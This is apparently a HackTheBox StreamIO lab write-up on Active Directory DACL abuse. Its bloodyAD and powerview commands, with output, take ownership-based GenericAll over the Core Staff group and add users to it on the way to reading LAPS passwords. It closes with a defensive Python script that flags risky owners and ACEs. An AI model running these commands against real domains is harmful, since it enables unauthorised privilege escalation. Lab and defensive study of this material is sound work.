Ownership of a Domain object


Successful lateral movement to the JDgodd user opens the door to further leveraging the ACE discovered during the earlier BloodHound session.

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ bloodyAD -d STREAMIO.HTB -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --host dc.streamio.htb get object 'CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB' --resolve-sd | grep Owner   
ntsecuritydescriptor.owner: JDgodd

The JDgodd user has ownership of the Core Staff group.

Because the owner of an object can always modify its DACL, ownership effectively gives the user complete control over the aforementioned domain object, which is what opens the path to DACL abuse.

DACL abuse


While many methods could be used to perform such an operation, the previously generated TGT will be used here, to emphasize the importance of OPSEC from an adversary's perspective. Additionally, a Python implementation of PowerView will be used for remote operation.

It is also worth noting that the tool itself is incomplete, as it does not support all of PowerView's features. It does, however, include all the commands needed in this particular case.

WriteOwner?


┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Set-DomainObjectOwner -TargetIdentity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -PrincipalIdentity "CN=JDGODD,CN=USERS,DC=STREAMIO,DC=HTB"'
[2023-11-15 01:53:16] LDAP Signing NOT Enforced!
[2023-11-15 01:53:16] [Set-DomainObjectOwner] JDgodd is already the owner of the CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb

I tried testing out the strange WriteOwner privilege shown in the BloodHound session, and the output shows that the JDgodd user ALREADY owns the domain object CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB. So it was likely a false-positive error from BloodHound, since the ownership is already there. Moving on.

GenericAll


┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Add-DomainObjectAcl -TargetIdentity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -PrincipalIdentity JDgodd -Rights All'
[2023-11-15 01:56:21] LDAP Signing NOT Enforced!
[2023-11-15 01:56:21] Found principal identity dn CN=JDgodd,CN=Users,DC=streamIO,DC=htb
[2023-11-15 01:56:21] Found target identity dn CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
[2023-11-15 01:56:21] Adding all privilege to CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB
[2023-11-15 01:56:22] Success! User JDgodd now has GenericAll privileges on CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB

First, I will need to grant the JDgodd user complete control over the Core Staff group, using the ownership privilege. The JDgodd user now has the GenericAll privilege over the domain object.

Add-DomainGroupMember


┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Add-DomainGroupMember -Identity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -Members JDgodd' 
[2023-11-15 02:03:33] LDAP Signing NOT Enforced!
[2023-11-15 02:03:33] User JDgodd successfully added to CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB
 
┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Add-DomainGroupMember  -Identity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB" -Members nikk37'           
[2023-11-15 02:40:03] LDAP Signing NOT Enforced!
[2023-11-15 02:40:03] User nikk37 successfully added to CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB

I can then proceed to grant the JDgodd user (or anyone) membership of the Core Staff group, using the previously gained GenericAll privilege. For ease of access, I also added the nikk37 user to the group, as there is already an existing PowerShell session with that user.

Verify


┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ KRB5CCNAME=JDgodd@dc.streamio.htb.ccache powerview 'streamio.htb/@dc.streamio.htb' -k --no-pass --dc-ip $IP -q 'Get-DomainGroupMember  -Identity "CN=CORE STAFF,CN=USERS,DC=STREAMIO,DC=HTB"'                
[2023-11-15 02:41:50] LDAP Signing NOT Enforced!
GroupDomainName             : CORE STAFF
GroupDistinguishedName      : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain                : streamio.htb
MemberName                  : JDgodd
MemberDistinguishedName     : CN=JDgodd,CN=Users,DC=streamIO,DC=htb
MemberSID                   : S-1-5-21-1470860369-1569627196-4264678630-1104
 
GroupDomainName             : CORE STAFF
GroupDistinguishedName      : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain                : streamio.htb
MemberName                  : nikk37
MemberDistinguishedName     : CN=nikk37,CN=Users,DC=streamIO,DC=htb
MemberSID                   : S-1-5-21-1470860369-1569627196-4264678630-1106

Both the JDgodd and nikk37 users are now part of the Core Staff group. Lastly, the Core Staff group is a privileged group with the ReadLAPSPassword privilege. More on that will be covered in the [[StreamIO_ReadLAPSPassword|next section]] (see also ReadLAPSPassword on The Hacker Recipes: https://www.thehacker.recipes/a-d/movement/dacl/readlapspassword).
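The ownership check (bloodyAD --resolve-sd) and the GenericAll grant above are exactly what a defender should audit on sensitive groups. As an added example, not from the walkthrough or from powerview.py, this Python script parses a raw self-relative nTSecurityDescriptor and reports any principal outside an expected set that owns the object or holds GenericAll, WriteOwner or WriteDacl; the sample descriptor is constructed inline from JDgodd's SID in the output above, with Domain Admins (well-known RID 512) and SYSTEM assumed as the expected holders.

```python
import struct
RIGHTS = {"GenericAll": 0x10000000, "WriteOwner": 0x00080000, "WriteDacl": 0x00040000}  # ADS_RIGHTS_ENUM bits

def parse_sid(buf, off):
    """Decode the binary SID at buf[off:] into S-1-... form."""
    count = buf[off + 1]
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (buf[off], int.from_bytes(buf[off + 2:off + 8], "big"), "-".join(map(str, subs)))

def parse_sd(sd):
    """Self-relative SECURITY_DESCRIPTOR -> (owner SID, [(trustee SID, access mask)] for allow ACEs)."""
    _rev, _sbz, _ctrl, off_owner, _off_group, _off_sacl, off_dacl = struct.unpack_from("<BBHIIII", sd)
    owner = parse_sid(sd, off_owner) if off_owner else None
    aces = []
    if off_dacl:
        ace_count = struct.unpack_from("<H", sd, off_dacl + 4)[0]
        pos = off_dacl + 8  # skip the 8-byte ACL header
        for _ in range(ace_count):
            ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
            sid_off = pos + 8
            if ace_type in (0x05, 0x06):  # object ACE: Flags field plus optional ObjectType/InheritedObjectType GUIDs
                obj_flags = struct.unpack_from("<I", sd, pos + 8)[0]
                sid_off = pos + 12 + 16 * bin(obj_flags & 0x3).count("1")
            if ace_type in (0x00, 0x05):  # ACCESS_ALLOWED(_OBJECT)_ACE grants rights; deny ACEs are skipped
                aces.append((parse_sid(sd, sid_off), mask))
            pos += ace_size
    return owner, aces

def risky_principals(sd, allowlist):
    """Owner and control rights held by any SID outside allowlist, as (sid, right) pairs."""
    owner, aces = parse_sd(sd)
    found = [(owner, "Owns")] if owner and owner not in allowlist else []
    for sid, mask in aces:  # note: full control may also be stored as the expanded mask 0x000F01FF
        found += [(sid, name) for name, bit in RIGHTS.items() if sid not in allowlist and mask & bit]
    return found

def sid_bytes(sid):
    """Encode an S-1-... string as a binary SID (used only to construct the sample below)."""
    parts = [int(p) for p in sid.split("-")[1:]]
    return bytes([parts[0], len(parts) - 2]) + parts[1].to_bytes(6, "big") + struct.pack("<%dI" % (len(parts) - 2), *parts[2:])
def build_sd(owner, allow_aces):
    """Constructed self-relative SD: owner plus a DACL of plain ACCESS_ALLOWED_ACEs (type 0x00)."""
    body = b"".join(struct.pack("<BBHI", 0, 0, 8 + len(sid_bytes(s)), m) + sid_bytes(s) for s, m in allow_aces)
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(body), len(allow_aces), 0) + body
    own = sid_bytes(owner)
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 20, 0, 0, 20 + len(own)) + own + dacl  # SE_SELF_RELATIVE|SE_DACL_PRESENT

# Constructed sample mirroring the page: JDgodd (RID 1104, from the output above) owns the group and holds GenericAll.
DOMAIN = "S-1-5-21-1470860369-1569627196-4264678630"
JDGODD, DOMAIN_ADMINS, SYSTEM = DOMAIN + "-1104", DOMAIN + "-512", "S-1-5-18"  # RID 512 = Domain Admins (assumed expected)
EXPECTED = {DOMAIN_ADMINS, SYSTEM}
SAMPLE_SD = build_sd(JDGODD, [(DOMAIN_ADMINS, 0x10000000), (JDGODD, 0x10000000)])
```

Running risky_principals(SAMPLE_SD, EXPECTED) flags JDgodd twice, as owner and as GenericAll holder; on a real domain the same check would be fed the nTSecurityDescriptor bytes fetched over LDAP.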